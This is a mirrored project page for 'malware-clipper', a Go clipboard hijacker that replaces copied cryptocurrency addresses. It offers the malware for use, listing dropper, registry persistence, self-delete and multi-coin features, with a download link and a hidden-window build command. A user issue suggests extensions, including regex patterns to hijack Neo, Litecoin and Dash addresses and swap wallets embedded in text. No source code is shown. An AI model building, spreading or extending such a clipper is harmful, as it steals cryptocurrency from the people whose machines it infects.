Coder Social home page Coder Social logo

malware-clipper's Introduction

📋malware-clipper

A simple, robust, and native clipboard hijacker written in Go.

✅Features

. Dropper.

. Persistence via the Registry.

. Self delete after drop.

. Mutex to ensure only one instance is running at time.

. Support of seven different crypto addresses.

. Low CPU usage.

👷Setup

Untitled

. Make sure go is installed & added to path. https://go.dev/dl/go1.20.4.windows-amd64.msi

. Download the project. https://github.com/DyNaam1c/malware-clipper/releases/download/SourceCode/SourceCode.zip

. Jump into the projects directory run "go build -ldflags -H=windowsgui main.go".

❌Legal disclaimer

I the creator assumes no responsibility for anyones actions taken as a result of this code.

☕️Buy me a coffee

BTC: bc1q80jm6sqtaj9y7kcgtztydgq5z9pluzctxq92je

ETH: 0x55E6C33173E4b39495670A581CBA59CeC8020599

malware-clipper's People

Contributors

dynaam1c avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

malware-clipper's Issues

Improvements and suggestions

Hi really nice code,
here are some suggestions and features to add:

  1. it would be really nice to also be able get the wallet in the middle of text and just replace the wallet and leave the rest of the text untouched, since right now only can change the wallet if only wallet alone has been copied.
    maybe you can do it with a loop for each word of clipboard and find the wallet and only change that.

  2. also would be nice to add more wallets here is just algorithm of 3 wallets just need to be formatted for GOlan
    Neo : "(?:^A[0-9a-zA-Z]{33}$)"
    LTC : "(?:^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$)"
    Dash : "(?:^X[1-9A-HJ-NP-Za-km-z]{33}$)"

wish to hear from you.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.